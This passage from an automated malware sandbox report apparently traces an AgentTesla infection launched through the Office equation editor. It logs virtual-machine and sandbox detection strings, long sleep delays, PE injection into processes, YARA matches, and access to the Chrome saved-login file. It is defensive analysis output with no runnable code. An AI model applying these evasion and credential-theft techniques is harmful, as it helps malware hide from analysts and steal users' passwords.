                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion:

                      barindex
                      Yara detected AntiVM3Show sources
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
                      Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_BaseBoard
                      Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)Show sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_NetworkAdapterConfiguration
                      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
                      Source: joewealth28743.exe, 00000003.00000002.2142270666.00000000023D4000.00000004.00000001.sdmp, Nwefile.exe, 00000005.00000002.2214264595.00000000020F6000.00000004.00000001.sdmp, Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
                      Source: joewealth28743.exe, 00000003.00000002.2142270666.00000000023D4000.00000004.00000001.sdmp, Nwefile.exe, 00000005.00000002.2214264595.00000000020F6000.00000004.00000001.sdmp, Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWindow / User API: threadDelayed 514
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWindow / User API: threadDelayed 9221
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 404
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 2686
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWindow / User API: threadDelayed 9526
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2596Thread sleep time: -240000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 912Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3008Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 2180Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3060Thread sleep count: 514 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3060Thread sleep count: 9221 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exe TID: 3044Thread sleep count: 106 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1800Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2004Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2596Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1944Thread sleep time: -4611686018427385s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 1944Thread sleep time: -90000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2924Thread sleep count: 404 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2952Thread sleep count: 2686 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2996Thread sleep time: -31500s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 2648Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3052Thread sleep time: -300000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep time: -7378697629483816s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep time: -120000s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3064Thread sleep count: 9526 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3064Thread sleep count: 221 > 30
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe TID: 3020Thread sleep count: 100 > 30
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::CreateInstanceEnum - Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeWMI Queries: IWbemServices::ExecQuery - SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeLast function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 30000
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 31500
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeThread delayed: delay time: 30000
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: vmware
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMWARE
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
                      Source: Nwefile.exe, 00000007.00000002.2237024296.0000000002376000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

                      barindex
                      Injects a PE file into a foreign processesShow sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeMemory written: C:\Users\user\AppData\Roaming\joewealth28743.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory written: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeMemory written: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe base: 400000 value starts with: 4D5A
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe C:\Users\user\AppData\Roaming\joewealth28743.exe
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeProcess created: C:\Users\user\AppData\Roaming\joewealth28743.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeProcess created: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe {path}
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Program Manager
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
                      Source: joewealth28743.exe, 00000004.00000002.2352649918.0000000000FB0000.00000002.00000001.sdmp, Nwefile.exe, 00000008.00000002.2351879422.0000000000C30000.00000002.00000001.sdmpBinary or memory string: !Progman
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeQueries volume information: C:\Users\user\AppData\Roaming\joewealth28743.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeQueries volume information: C:\Users\user\AppData\Roaming\joewealth28743.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\Nwefile\Nwefile.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000006.00000002.2236823411.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.2237439431.00000000021A1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2239066475.00000000035BB000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.2143882626.000000000361B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.2216387056.000000000333B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2351324007.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2352252684.0000000002371000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2351274027.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2352749717.00000000023B1000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2353787746.000000000278B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.2353745503.0000000002723000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 1980, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: joewealth28743.exe PID: 2988, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 1888, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2792, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2664, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Nwefile.exe PID: 2768, type: MEMORY
                      Source: Yara matchFile source: 8.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.Nwefile.exe.400000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.Nwefile.exe.33d6ac0.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.joewealth28743.exe.36b6ac0.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.joewealth28743.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.Nwefile.exe.3656ac0.5.unpack, type: UNPACKEDPE
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Roaming\joewealth28743.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
